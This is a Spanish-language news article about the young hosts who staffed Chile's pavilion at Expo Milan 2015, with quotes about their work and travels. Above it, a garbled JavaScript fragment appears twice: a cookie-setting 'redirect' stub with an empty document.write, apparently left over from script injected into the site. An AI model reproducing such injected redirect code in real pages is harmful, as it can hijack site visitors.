=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

Anfitriones: la experiencia de representar a Chile ante el mundo

21 Ene 2016

Compartir:

Recepcionar más de 1.2 millones de personas durante seis meses no es tarea fácil. Esta fue la misión que cumplió el contingente de 40 anfitriones que estuvo en “El Amor de Chile”, guiando a los visitantes extranjeros por el recorrido que mostraban las bondades del país de norte a sur.

Durante el proceso de selección, fueron más de 2.200 los postulantes que desearon ser parte de este grupo de jóvenes que representaron al motor principal en la rutina del pabellón.

“Cuando llegué me pareció alucinante, sobre todo porque en el grupo habíamos varios arquitectos, por lo que llegar a esta gran ciudad interactiva que era Expo Milán fue increíble, me sentí súper afortunada”, cuenta Montserrat Rojas, quien dejó su trabajo en una oficina de Arquitectura para representar a Chile durante gran parte del 2015.

Del mismo modo, la ingeniera Daniela Bruzzone recuerda que “al principio andábamos todos perdidos, como pollos. Nunca imaginé que este desafío me iba a presentar un grupo humano tan complementado. A medida que nos fuimos conociendo, cada uno asumió su mejor rol y logramos un trabajo full de equipo”.

Cada uno de ellos trabajó en turnos rotativos de cuatro días, más dos libres. Aunque la jornada fue a veces agotadora, todos concuerdan que el objetivo era aprovechar al máximo sus días de descanso para recorrer la mayor cantidad de destinos. “Mientras estaba trabajando en la Expo pude visitar París, Madrid, Venecia y otros destinos de Italia, y ya terminada pude recorrer otros países más lejanos como Rusia, Dinamarca, Letonia y Polonia”, cuenta el arquitecto Rafael Bordachar, quien regresó a Chile el 15 de diciembre.

Si bien fueron parte del centenar de presentaciones artísticas, charlas culturales y actividades gremiales, para ellos el hito más emotivo fue el cierre del pabellón, momento en el que las dificultades del principio quedaron en el pasado y comenzaban a emprender su vuelta a casa o sus proyectos personales. “El cierre fue raro, yo creo que estábamos todos con la adrenalina hasta el cuello, con el reloj de arena con dos granitos. Cuando apagaron las luces y cerraron el pabellón teníamos sentimientos encontrados de felicidad y pena a la vez”, cuenta Daniela, quien fue la primera en devolverse para retomar su trabajo en la empresa de su familia.

Por último, para quienes deseen ser parte de futuras exposiciones, Montserrat aconseja que “vayan dispuestos a todo, tomen cada tarea como un desafío y aunque es un trabajo a veces agotador, de verdad es algo que puede ser la experiencia de tu vida”. Asimismo Rafael agrega que “lo importante es ponerse la camiseta por Chile y sentirse orgullosos de nuestro país, estando afuera se darán cuenta de la cantidad de cosas positivas que tenemos”.

Partners

Media Partner